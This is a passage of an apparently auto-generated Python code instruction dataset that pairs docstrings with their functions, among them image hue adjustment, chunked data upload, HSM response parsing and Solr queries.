Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
### Response:
def put_edit(self, f, *args, **kwds):
"""
Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
"""
self.put_nowait(functools.partial(f, *args, **kwds)) |
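put_edit only wraps the call in functools.partial and enqueues it; some consumer later drains the queue and invokes the partials. A minimal, self-contained sketch of that pattern, using a plain queue.Queue in place of the EditQueue class this method belongs to:

import functools
import queue

edits = queue.Queue(maxsize=8)

def put_edit(f, *args, **kwds):
    edits.put_nowait(functools.partial(f, *args, **kwds))  # raises queue.Full if the queue is full

put_edit(print, "hello", end="!\n")

# consumer side: drain the queue and execute the deferred edits
while not edits.empty():
    edits.get_nowait()()   # prints "hello!"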
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None:
"""
Converts the specified attributes of an object to lower case, modifying
the object in place.
"""
for a in attrs:
value = getattr(obj, a)
if value is None:
continue
setattr(obj, a, value.lower()) | Converts the specified attributes of an object to lower case, modifying
the object in place. | Below is the the instruction that describes the task:
### Input:
Converts the specified attributes of an object to lower case, modifying
the object in place.
### Response:
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None:
"""
Converts the specified attributes of an object to lower case, modifying
the object in place.
"""
for a in attrs:
value = getattr(obj, a)
if value is None:
continue
setattr(obj, a, value.lower()) |
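A quick usage sketch with a throwaway class; None-valued attributes are skipped rather than lowercased:

class Record:
    def __init__(self):
        self.name = "ALICE"
        self.city = None

r = Record()
convert_attrs_to_lowercase(r, ["name", "city"])   # uses the function defined above
print(r.name, r.city)                              # alice None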
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb | Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__. | Below is the the instruction that describes the task:
### Input:
Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
### Response:
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb |
def get_mcc(self, ip):
''' Get mcc '''
rec = self.get_all(ip)
return rec and rec.mcc | Get mcc | Below is the the instruction that describes the task:
### Input:
Get mcc
### Response:
def get_mcc(self, ip):
''' Get mcc '''
rec = self.get_all(ip)
return rec and rec.mcc |
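The `rec and rec.mcc` return is a short-circuit guard: when the lookup yields nothing, the method returns None instead of raising AttributeError. Illustrated with a hypothetical stand-in record class:

class Rec:
    mcc = 310          # stand-in for whatever get_all() returns

rec = Rec()
print(rec and rec.mcc)   # 310
rec = None
print(rec and rec.mcc)   # None (mcc is never touched, thanks to short-circuiting)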
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size,
poll_interval=analyzere.upload_poll_interval,
upload_callback=lambda x: None,
commit_callback=lambda x: None):
"""
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
"""
if not callable(upload_callback):
raise Exception('provided upload_callback is not callable')
if not callable(commit_callback):
raise Exception('provided commit_callback is not callable')
file_obj = StringIO(file_or_str) if isinstance(
file_or_str, six.string_types) else file_or_str
# Upload file with known entity size if file object supports random
# access.
length = None
if hasattr(file_obj, 'seek'):
length = utils.file_length(file_obj)
# Initiate upload session
request_raw('post', self._data_path,
headers={'Entity-Length': str(length)})
else:
request_raw('post', self._data_path)
# Upload chunks
for chunk, offset in utils.read_in_chunks(file_obj, chunk_size):
headers = {'Offset': str(offset),
'Content-Type': 'application/offset+octet-stream'}
request_raw('patch', self._data_path, headers=headers, body=chunk)
# if there is a known size, and an upload callback, call it
if length:
upload_callback(offset * 100.0 / length)
upload_callback(100.0)
# Commit the session
request_raw('post', self._commit_path)
# Block until data has finished processing
while True:
resp = self.upload_status
if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'):
commit_callback(100.0)
return resp
else:
commit_callback(float(resp.commit_progress))
time.sleep(poll_interval) | Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10% | Below is the the instruction that describes the task:
### Input:
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
### Response:
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size,
poll_interval=analyzere.upload_poll_interval,
upload_callback=lambda x: None,
commit_callback=lambda x: None):
"""
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
"""
if not callable(upload_callback):
raise Exception('provided upload_callback is not callable')
if not callable(commit_callback):
raise Exception('provided commit_callback is not callable')
file_obj = StringIO(file_or_str) if isinstance(
file_or_str, six.string_types) else file_or_str
# Upload file with known entity size if file object supports random
# access.
length = None
if hasattr(file_obj, 'seek'):
length = utils.file_length(file_obj)
# Initiate upload session
request_raw('post', self._data_path,
headers={'Entity-Length': str(length)})
else:
request_raw('post', self._data_path)
# Upload chunks
for chunk, offset in utils.read_in_chunks(file_obj, chunk_size):
headers = {'Offset': str(offset),
'Content-Type': 'application/offset+octet-stream'}
request_raw('patch', self._data_path, headers=headers, body=chunk)
# if there is a known size, and an upload callback, call it
if length:
upload_callback(offset * 100.0 / length)
upload_callback(100.0)
# Commit the session
request_raw('post', self._commit_path)
# Block until data has finished processing
while True:
resp = self.upload_status
if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'):
commit_callback(100.0)
return resp
else:
commit_callback(float(resp.commit_progress))
time.sleep(poll_interval) |
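The chunk loop relies on utils.read_in_chunks, which this record does not show; it presumably yields (chunk, offset) pairs. A hypothetical, minimal stand-in for such a helper, only to make the loop concrete (the real implementation may differ):

from io import BytesIO

def read_in_chunks(file_obj, chunk_size):
    """Yield (chunk, offset) pairs until the file is exhausted (illustrative only)."""
    offset = 0
    while True:
        chunk = file_obj.read(chunk_size)
        if not chunk:
            break
        yield chunk, offset
        offset += len(chunk)

print(list(read_in_chunks(BytesIO(b"abcdefgh"), 3)))
# [(b'abc', 0), (b'def', 3), (b'gh', 6)]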
def unpublish(namespace, name, version, registry=None):
''' Try to unpublish a recently published version. Return any errors that
occur.
'''
registry = registry or Registry_Base_URL
url = '%s/%s/%s/versions/%s' % (
registry,
namespace,
name,
version
)
headers = _headersForRegistry(registry)
response = requests.delete(url, headers=headers)
response.raise_for_status()
return None | Try to unpublish a recently published version. Return any errors that
occur. | Below is the the instruction that describes the task:
### Input:
Try to unpublish a recently published version. Return any errors that
occur.
### Response:
def unpublish(namespace, name, version, registry=None):
''' Try to unpublish a recently published version. Return any errors that
occur.
'''
registry = registry or Registry_Base_URL
url = '%s/%s/%s/versions/%s' % (
registry,
namespace,
name,
version
)
headers = _headersForRegistry(registry)
response = requests.delete(url, headers=headers)
response.raise_for_status()
return None |
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False):
""" Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
"""
scheme, n, path, p, q, f = urlparse(src_file)
if scheme in ('file', ''):
assert exists(src_file), "We'd prefer an input file that exists to one that doesn't"
if cache_dir is None:
cache_dir = expanduser(CACHE_DIR)
# only make the cache dir if it wasn't user-provided
if not isdir(cache_dir):
mkdir(cache_dir)
chmod(cache_dir, 0755)
dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file))
compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs) | Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
... | Below is the the instruction that describes the task:
### Input:
Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
### Response:
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False):
""" Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
"""
scheme, n, path, p, q, f = urlparse(src_file)
if scheme in ('file', ''):
assert exists(src_file), "We'd prefer an input file that exists to one that doesn't"
if cache_dir is None:
cache_dir = expanduser(CACHE_DIR)
# only make the cache dir if it wasn't user-provided
if not isdir(cache_dir):
mkdir(cache_dir)
chmod(cache_dir, 0755)
dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file))
compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs) |
def parser(scope, usage=''):
"""
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
"""
subcmds = []
for cmd in commands(scope):
subcmds.append(cmd.usage())
if subcmds:
subcmds.sort()
usage += '\n\nSub-Commands:\n '
usage += '\n '.join(subcmds)
parse = PARSER_CLASS(usage=usage)
parse.prog = PROGRAM_NAME
return parse | Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser> | Below is the the instruction that describes the task:
### Input:
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
### Response:
def parser(scope, usage=''):
"""
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
"""
subcmds = []
for cmd in commands(scope):
subcmds.append(cmd.usage())
if subcmds:
subcmds.sort()
usage += '\n\nSub-Commands:\n '
usage += '\n '.join(subcmds)
parse = PARSER_CLASS(usage=usage)
parse.prog = PROGRAM_NAME
return parse |
def parse_result(self, data):
"""
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
"""
# typedef struct {
# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)
# uint32_t keyHandle; // Key handle
# YSM_STATUS status; // Status
# uint8_t numBytes; // Number of bytes in AEAD block
# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block
# } YSM_AEAD_GENERATE_RESP;
nonce, \
key_handle, \
self.status, \
num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0)
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce)
offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6
aead = data[offset:offset + num_bytes]
self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead)
return self.response
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status) | Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed. | Below is the the instruction that describes the task:
### Input:
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
### Response:
def parse_result(self, data):
"""
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
"""
# typedef struct {
# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)
# uint32_t keyHandle; // Key handle
# YSM_STATUS status; // Status
# uint8_t numBytes; // Number of bytes in AEAD block
# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block
# } YSM_AEAD_GENERATE_RESP;
nonce, \
key_handle, \
self.status, \
num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0)
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce)
offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6
aead = data[offset:offset + num_bytes]
self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead)
return self.response
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status) |
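The response is parsed from a fixed little-endian layout: the nonce bytes, a uint32 key handle, a status byte, a length byte, then the AEAD itself starting at offset nonce_size + 6. A standalone sketch of that unpacking, assuming a 6-byte nonce purely for illustration (the real size and status codes come from pyhsm.defines):

import struct

NONCE_SIZE = 6                       # illustrative value only
fmt = "< %is I B B" % NONCE_SIZE     # same format string shape as above

# build a fake response: nonce, key handle 0x2000, an arbitrary status byte, 4 AEAD bytes
data = struct.pack(fmt, b"\x01\x02\x03\x04\x05\x06", 0x2000, 0x80, 4) + b"\xaa\xbb\xcc\xdd"

nonce, key_handle, status, num_bytes = struct.unpack_from(fmt, data, 0)
offset = struct.calcsize(fmt)        # == NONCE_SIZE + 6 for this layout
aead = data[offset:offset + num_bytes]
print(nonce.hex(), hex(key_handle), hex(status), aead.hex())
# 010203040506 0x2000 0x80 aabbccdd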
def str_transmission_rate(self):
"""Returns a tuple of human readable transmission rates in bytes."""
upstream, downstream = self.transmission_rate
return (
fritztools.format_num(upstream),
fritztools.format_num(downstream)
) | Returns a tuple of human readable transmission rates in bytes. | Below is the the instruction that describes the task:
### Input:
Returns a tuple of human readable transmission rates in bytes.
### Response:
def str_transmission_rate(self):
"""Returns a tuple of human readable transmission rates in bytes."""
upstream, downstream = self.transmission_rate
return (
fritztools.format_num(upstream),
fritztools.format_num(downstream)
) |
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files):
"""
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
"""
data = load_tabular_file(f, index_col=True, header=True)
fs, _ = drop_bids_suffix(f)
save_name, save_dir, _ = self._save_namepaths_bids_derivatives(
fs, tag, 'tvc', 'tvcconn')
if 'weight-var' in params.keys():
if params['weight-var'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-var'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
if 'weight-mean' in params.keys():
if params['weight-mean'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-mean'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
params['report'] = 'yes'
params['report_path'] = save_dir + '/report/'
params['report_filename'] = save_name + '_derivationreport.html'
if not os.path.exists(params['report_path']):
os.makedirs(params['report_path'])
if 'dimord' not in params:
params['dimord'] = 'time,node'
dfc = teneto.timeseries.derive_temporalnetwork(data.values, params)
dfc_net = TemporalNetwork(from_array=dfc, nettype='wu')
dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t')
sidecar = get_sidecar(f)
sidecar['tvc'] = params
if 'weight-var' in sidecar['tvc']:
sidecar['tvc']['weight-var'] = True
sidecar['tvc']['fc source'] = fc_files
if 'weight-mean' in sidecar['tvc']:
sidecar['tvc']['weight-mean'] = True
sidecar['tvc']['fc source'] = fc_files
sidecar['tvc']['inputfile'] = f
sidecar['tvc']['description'] = 'Time varying connectivity information.'
with open(save_dir + save_name + '.json', 'w') as fs:
json.dump(sidecar, fs)
if confounds_exist:
analysis_step = 'tvc-derive'
df = pd.read_csv(confound_files[i], sep='\t')
df = df.fillna(df.median())
ind = np.triu_indices(dfc.shape[0], k=1)
dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose())
# If windowed, prune df so that it matches with dfc_df
if len(df) != len(dfc_df):
df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))]
df.reset_index(inplace=True, drop=True)
# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.
dfc_df_z = (dfc_df - dfc_df.mean())
df_z = (df - df.mean())
R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div(
df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0)
R_df_describe = R_df.describe()
desc_index = R_df_describe.index
confound_report_dir = params['report_path'] + \
'/' + save_name + '_confoundcorr/'
confound_report_figdir = confound_report_dir + 'figures/'
if not os.path.exists(confound_report_figdir):
os.makedirs(confound_report_figdir)
report = '<html><body>'
report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>'
for c in R_df.columns:
fig, ax = plt.subplots(1)
ax = sns.distplot(
R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True})
fig.savefig(confound_report_figdir + c + '.png')
plt.close(fig)
report += '<h2>' + c + '</h2>'
for ind_name, r in enumerate(R_df_describe[c]):
report += str(desc_index[ind_name]) + ': '
report += str(r) + '<br>'
report += 'Distribution of corrlation values:'
report += '<img src=' + \
os.path.abspath(confound_report_figdir) + \
'/' + c + '.png><br><br>'
report += '</body></html>'
with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file:
file.write(report) | Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing. | Below is the the instruction that describes the task:
### Input:
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
### Response:
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files):
"""
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
"""
data = load_tabular_file(f, index_col=True, header=True)
fs, _ = drop_bids_suffix(f)
save_name, save_dir, _ = self._save_namepaths_bids_derivatives(
fs, tag, 'tvc', 'tvcconn')
if 'weight-var' in params.keys():
if params['weight-var'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-var'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
if 'weight-mean' in params.keys():
if params['weight-mean'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-mean'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
params['report'] = 'yes'
params['report_path'] = save_dir + '/report/'
params['report_filename'] = save_name + '_derivationreport.html'
if not os.path.exists(params['report_path']):
os.makedirs(params['report_path'])
if 'dimord' not in params:
params['dimord'] = 'time,node'
dfc = teneto.timeseries.derive_temporalnetwork(data.values, params)
dfc_net = TemporalNetwork(from_array=dfc, nettype='wu')
dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t')
sidecar = get_sidecar(f)
sidecar['tvc'] = params
if 'weight-var' in sidecar['tvc']:
sidecar['tvc']['weight-var'] = True
sidecar['tvc']['fc source'] = fc_files
if 'weight-mean' in sidecar['tvc']:
sidecar['tvc']['weight-mean'] = True
sidecar['tvc']['fc source'] = fc_files
sidecar['tvc']['inputfile'] = f
sidecar['tvc']['description'] = 'Time varying connectivity information.'
with open(save_dir + save_name + '.json', 'w') as fs:
json.dump(sidecar, fs)
if confounds_exist:
analysis_step = 'tvc-derive'
df = pd.read_csv(confound_files[i], sep='\t')
df = df.fillna(df.median())
ind = np.triu_indices(dfc.shape[0], k=1)
dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose())
# If windowed, prune df so that it matches with dfc_df
if len(df) != len(dfc_df):
df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))]
df.reset_index(inplace=True, drop=True)
# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.
dfc_df_z = (dfc_df - dfc_df.mean())
df_z = (df - df.mean())
R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div(
df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0)
R_df_describe = R_df.describe()
desc_index = R_df_describe.index
confound_report_dir = params['report_path'] + \
'/' + save_name + '_confoundcorr/'
confound_report_figdir = confound_report_dir + 'figures/'
if not os.path.exists(confound_report_figdir):
os.makedirs(confound_report_figdir)
report = '<html><body>'
report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>'
for c in R_df.columns:
fig, ax = plt.subplots(1)
ax = sns.distplot(
R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True})
fig.savefig(confound_report_figdir + c + '.png')
plt.close(fig)
report += '<h2>' + c + '</h2>'
for ind_name, r in enumerate(R_df_describe[c]):
report += str(desc_index[ind_name]) + ': '
report += str(r) + '<br>'
report += 'Distribution of corrlation values:'
report += '<img src=' + \
os.path.abspath(confound_report_figdir) + \
'/' + c + '.png><br><br>'
report += '</body></html>'
with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file:
file.write(report) |
def _post_query(self, **query_dict):
"""Perform a POST query against Solr and return the response as a Python
dict."""
param_dict = query_dict.copy()
return self._send_query(do_post=True, **param_dict) | Perform a POST query against Solr and return the response as a Python
dict. | Below is the the instruction that describes the task:
### Input:
Perform a POST query against Solr and return the response as a Python
dict.
### Response:
def _post_query(self, **query_dict):
"""Perform a POST query against Solr and return the response as a Python
dict."""
param_dict = query_dict.copy()
return self._send_query(do_post=True, **param_dict) |
def exec_python_rc(*args, **kwargs):
"""
Wrap running python script in a subprocess.
Return exit code of the invoked command.
"""
cmdargs, kwargs = __wrap_python(args, kwargs)
return exec_command_rc(*cmdargs, **kwargs) | Wrap running python script in a subprocess.
Return exit code of the invoked command. | Below is the the instruction that describes the task:
### Input:
